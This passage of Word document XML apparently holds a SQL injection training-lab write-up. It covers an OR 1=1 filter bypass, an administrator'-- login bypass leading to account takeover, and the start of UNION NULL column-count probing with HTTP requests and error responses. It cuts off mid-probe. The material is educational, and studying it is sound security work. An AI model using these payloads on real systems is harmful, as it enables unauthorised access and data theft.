          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>--' AND released = 1</w:t>
      </w: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Pr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Analysis:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The database evaluated </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>category = 'Gifts'</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> as either true or false, but the injected </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OR 1=1</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> statement forced every row evaluation to resolve to boolean true. The double-dash </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> truncated the release constraint (</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AND released = 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">). Consequently, unreleased, confidential catalog products were rendered in the HTTP response body, solving the lab. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lab 2: Authentication Logic Subversion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerable Endpoint:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Administrative Login Portal (</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>POST /login</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Query Context:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="ng-tns-c507410133-60"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL</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SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> users </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> username </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'USER_INPUT'</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AND</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> password </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'PASSWORD_INPUT'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Injection Mechanics:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Injected the username payload </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>administrator'--</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> while providing an empty string in the password field. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="ng-tns-c507410133-61"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL</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SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> users </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> username </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'administrator'</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>--' AND password = ''</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Analysis:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The parser verified the record matching </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>username = 'administrator'</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. The trailing comment token completely stripped out the password verification clause. The application backend verified the existence of the returned user profile and issued an authenticated administrative session cookie, successfully achieving account takeover. </w:t>
      </w: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Default="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.2 Practitioner Practical Work: UNION-Based Mechanics &amp; Column Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> operator allows an attacker to append rows from a secondary </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> statement to the original query’s output. Successful execution requires satisfying two strict constraints:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The injected query must return the exact number of columns projected by the original query. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The data types of each corresponding column must match between queries. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lab 7: Column Count Determination via Systematic NULL Probing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerable Parameter:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>category</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Methodology:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Because </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be cast to integers, strings, dates, and objects across almost all SQL implementations, it is the optimal primitive for discovering column lengths without causing data-type mismatches.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Testing Progression:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="ng-tns-c507410133-62"/>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/filter?category='+UNION+SELECT+NULL--</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--&gt; Response: HTTP 500 Internal Server Error (Column count mismatch)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="vhdl"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="vhdl"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GET /filter?category='+UNION+</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="vhdl"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="vhdl"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-- HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="vhdl"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>--&gt; Response: HTTP 500 Internal Server Error (Column count mismatch)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="vhdl"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="vhdl"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="vhdl"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GET /filter?category='+UNION+</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="vhdl"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="vhdl"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
